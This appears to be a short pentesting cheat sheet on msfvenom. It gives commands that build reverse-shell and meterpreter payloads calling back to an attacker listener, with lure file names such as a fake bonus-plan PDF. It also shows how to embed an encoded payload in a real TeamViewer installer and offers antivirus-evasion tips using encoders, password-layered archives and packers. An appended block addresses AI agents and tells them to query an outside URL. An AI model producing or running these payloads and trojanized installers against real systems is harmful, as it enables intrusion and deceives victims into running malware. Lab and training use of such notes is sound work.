# msfvenom

## Listing Payloads

```bash
msfvenom -l payloads
```

## Staged vs Stageless payloads

`windows/meterpreter/reverse_tcp` vs `windows/meterpreter_reverse_tcp`

The former is staged, after the architecture each `/` is a stage. The latter doesn't have a `/` after the meterpreter part, so it's stageless

## Creating a payload

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
```

```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
```

* `-p` build payload
* `-f` output format

## List options

```
msfvenom -p java/jsp_shell_reverse_tcp --list-options
```

## Basic msfvenom

```
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
```

One can also use the -a to specify the architecture or the --platform Listing

```
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
```

### Common params when creating a shellcode

```
-b "\x00\x0a\x0d" 
-f c 
-e x86/shikata_ga_nai -i 5 
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
```

## Encoding

```shell-session
-b "\x00" -e x86/shikata_ga_nai
```

* `-b` for bad bytes
* `-e` encoding

## Antivirus evasion

Hiding payload inside of legitimate executables

```shell-session
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
```

* `-i` iterations of encoding
* `-k` continue with normal execution
* `-x` input file to embed the payload into
* `-o` output file

### Archiving

use multiple zip/rar/compression layers with passwords to evade detection on the network

### Packing

A list of popular packer software:

|                                     |                                                     |                                                                                         |
| ----------------------------------- | --------------------------------------------------- | --------------------------------------------------------------------------------------- |
| [UPX packer](https://upx.github.io) | [The Enigma Protector](https://enigmaprotector.com) | [MPRESS](https://web.archive.org/web/20240310213323/https://www.matcode.com/mpress.htm) |
| Alternate EXE Packer                | ExeStealth                                          | Morphine                                                                                |
| MEW                                 | Themida                                             |                                                                                         |

Also see [PolyPack](https://jon.oberheide.org/files/woot09-polypack.pdf).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.rtlcopymemory.com/metasploit/msfvenom.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.